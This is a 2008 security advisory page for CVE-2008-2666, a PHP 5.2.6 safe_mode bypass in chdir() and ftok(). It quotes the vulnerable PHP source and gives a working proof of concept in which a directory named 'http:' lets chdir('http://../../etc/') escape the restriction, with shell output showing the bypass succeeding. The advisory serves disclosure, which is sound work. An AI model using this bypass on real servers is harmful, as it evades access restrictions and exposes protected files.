SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : SecurityReason Advisory

Arrow  Topic : PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass
Arrow  SecurityAlert : 55
  CVE : CVE-2008-2666
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : No
Arrow  Local Exploit : Yes
Arrow  Exploit Given : Yes
Arrow  Credit : Maksymilian Arciemowicz
Arrow  Date : 17.06.2008

Arrow  Affected Software : PHP 5.2.6 and prior

FREEWARE Network Scanner Security Events Montoring
Detect network vulnerabilities. Freeware dld! Monitor event logs for security. Dld 30-day eval!

Arrow  Advisory Text :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

chdir ? Change directory

SYNOPSIS:

bool chdir ( string $directory )

http://pl.php.net/manual/en/function.chdir.php


ftok ? Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok ( string $pathname , string $proj )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON
WILL NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's see to chdir() function

- ---
PHP_FUNCTION(chdir)
{
char *str;
int ret, str_len;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len)
== FAILURE) {
RETURN_FALSE;
}

if ((PG(safe_mode) && !php_checkuid(str, NULL,
CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
RETURN_FALSE;
}
ret = VCWD_CHDIR(str);

if (ret != 0) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)",
strerror(errno), errno);
RETURN_FALSE;
}

RETURN_TRUE;
}
- ---

str is beeing checked by safe_mode
example:

- ---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is
80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
- ---

in current directory, we should create subdir "http:". => it is possible to
create chdir("http://../../../../../../")
and we are in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL,
CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)))

for
str="http://../../../../../../"

safe_mode will ignore all paths with http://

that same situation with ftok() function (and more)

- ---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
- -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is
80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line
3
/www
cxib#
- ---/EXAMPLE1---

- ---EXAMPLE2---
cxib# ls -la /www/wufff.php
- -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x 2 www www 512 Jun 17 17:12 .
drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
- ---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON
WILL NOT LISTS ALL VULNERABLE FUNCTIONS

- --- 2. How to fix ---
Do not use safe_mode as a main safety

- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-----END PGP SIGNATURE-----
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...
Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration
PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass
Copyright © SecurityReason.com. All Rights Reserved.